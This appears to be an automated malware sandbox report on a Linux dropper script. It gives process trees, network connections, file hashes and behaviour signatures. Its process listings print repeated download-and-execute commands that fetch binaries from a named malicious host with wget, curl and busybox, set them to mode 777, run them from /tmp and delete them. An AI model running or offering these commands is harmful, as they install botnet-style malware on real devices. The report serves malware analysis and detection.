/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/chmod
[chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
[./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/rm
[rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/chmod
[chmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
[./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/rm
[rm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/chmod
[chmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
[./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/rm
[rm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/chmod
[chmod 777 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF
[./HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/rm
[rm HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/chmod
[chmod 777 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p
[./JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/rm
[rm JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/chmod
[chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
[./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/rm
[rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/chmod
[chmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
[./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/rm
[rm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/chmod
[chmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
[./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/rm
[rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/chmod
[chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
[./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/rm
[rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/chmod
[chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
[./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/rm
[rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/chmod
[chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
[./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/rm
[rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/chmod
[chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
[./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/rm
[rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/chmod
[chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
[./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/rm
[rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-mipsel-20240226-en
Max time kernel
149s
Max time network
108s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | N/A |
| N/A | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | N/A |
| N/A | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | N/A |
| N/A | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | N/A |
| N/A | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | N/A |
| N/A | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | N/A |
| N/A | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | N/A |
| N/A | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | N/A |
| N/A | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | N/A |
| N/A | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | N/A |
| N/A | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/chmod
[chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
[./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/rm
[rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/chmod
[chmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
[./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/rm
[rm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/chmod
[chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
[./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/rm
